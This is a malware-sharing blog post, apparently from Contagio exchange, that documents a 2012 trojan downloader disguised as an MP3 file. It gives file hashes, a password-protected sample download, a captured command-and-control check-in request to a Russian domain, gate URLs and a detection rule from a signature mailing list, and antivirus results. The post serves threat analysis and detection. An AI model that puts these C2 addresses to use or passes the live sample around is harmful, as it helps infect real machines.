About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Thursday, June 7, 2012

023 Crime Downloader Trojan (name?) - web - June 7, 2012

Audio_Recording_MP3
MD5: FDC170166CB958E138E7D401F3C6F896
SHA256: A3253B1732A50146038A68B3B46260F80BEC6C1C

 Download (pass infected)

pcap file






Audio_Recording_MP3.exe
Creates: c:\Documents and Settings\Administrator\Local Settings\Application Data\blbljsqp.exe  (file name random)
Value changes: HKCU\software\microsoft\windows\currentversion\explorer\shell folders[local appdata]

 GET /gley/index.php?r=gate&id=e81b9088&group=30.05.2012&debug=0 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: krasguatanany.ru

HTTP/1.1 404 Not Found
Server: nginx/1.1.19
Date: Thu, 07 Jun 2012 16:09:56 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Connection: keep-alive
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /gley/index.php was not found on this server.</p>
<hr>
<address>Apache/2.2.16 (Debian) Server at krasguatanany.ru Port 80</address>
</body></html>



ET signature discussion

Nathan Fowler | 8 May 17:45
Re: Create Signatures

On 05/08/12 09:40, Phil Robinson wrote:
> hxxp://bing[.]com/afyu/index.php?r=gate&id=[N]&group=[D]&debug=0
> hxxp://twitter[.]com/nygul/index.php?r=gate&ac=[N]&group=[D]&debug=0
> hxxp://fb[.]com/dwrgh/index.php?r=gate&fg=[N]&group=[D]&debug=0
> hxxp://google[.]com/efwgh/index.php?r=gate&cc=[N]&group=[D]&debug=0
> hxxp://everkosmo2012[.]ru/ab/index.php?r=gate&id=[N]&group=[D]&debug=0
>
> I was unable to find any exiting signatures. Can someone help? Thanks.....

Looks like here's an example,

http:// everkosmo2012.ru/ab/index.php?r=gate&id=00cd1a40&group=20.04.2012&debug=0

Not sure what this is called though,

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN -
Check-in Not sure what this is called"; flow:established,to_server;
content:".php?r=gate"; http_uri; fast_pattern; content:"&group=";
http_uri; distance:0; content:"&debug="; http_uri; distance:0;
classtype:trojan-activity; sid:x; rev:1;)

https://www.virustotal.com/file/1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4/analysis/

SHA256: 1c464848df9a803f01035dacf70888a9d942e42ed44e071443a9742930a23dd4
SHA1: a3253b1732a50146038a68b3b46260f80bec6c1c
MD5: fdc170166cb958e138e7d401f3c6f896
File size: 53.0 KB ( 54272 bytes )
File name: 1338806789.Audio_Recording_MP3-itYk.exe
File type: Win32 EXE
Detection ratio: 24 / 41
Analysis date: 2012-06-04 10:46:37 UTC ( 3 days, 5 hours ago )

0
2
More details
Antivirus Result Update
AhnLab-V3 Win-Trojan/Kuluoz.54272 20120604
AntiVir TR/Crypt.XPACK.Gen 20120604
Antiy-AVL - 20120604
Avast Win32:Dropper-gen [Drp] 20120604
AVG Downloader.Generic12.CFBJ 20120604
BitDefender Trojan.Generic.KDV.637381 20120604
ByteHero - 20120531
CAT-QuickHeal - 20120604
ClamAV - 20120602
Commtouch - 20120604
Comodo - 20120604
DrWeb Trojan.MulDrop3.51893 20120604
Emsisoft Trojan-Downloader.Win32.Dapato!IK 20120604
eSafe - 20120603
F-Prot - 20120603
F-Secure Trojan.Generic.KDV.637381 20120604
Fortinet W32/Dapato.LON!tr.dldr 20120603
Ikarus Trojan-Downloader.Win32.Dapato 20120604
Jiangmin - 20120604
K7AntiVirus - 20120601
Kaspersky Trojan-Downloader.Win32.Dapato.lon 20120604
McAfee Generic Downloader.z 20120604
McAfee-GW-Edition Generic Downloader.z 20120604
Microsoft TrojanDownloader:Win32/Kuluoz.B 20120602
NOD32 Win32/TrojanDownloader.Zortob.B 20120604
Norman W32/Troj_Generic.BZPCE 20120603
nProtect Trojan.Generic.KDV.637381 20120604
Panda Trj/CI.A 20120603
PCTools Trojan.Gen 20120604
Rising - 20120604
Sophos Troj/Agent-WGO 20120604
SUPERAntiSpyware - 20120602
Symantec Trojan.Gen 20120604
TheHacker - 20120531
TotalDefense - 20120604
TrendMicro TROJ_KRYPTIK.XCV 20120604
TrendMicro-HouseCall TROJ_KRYPTIK.XCV 20120604
VBA32 - 20120604
VIPRE Trojan.Win32.Generic!BT 20120604
ViRobot - 20120604
VirusBuster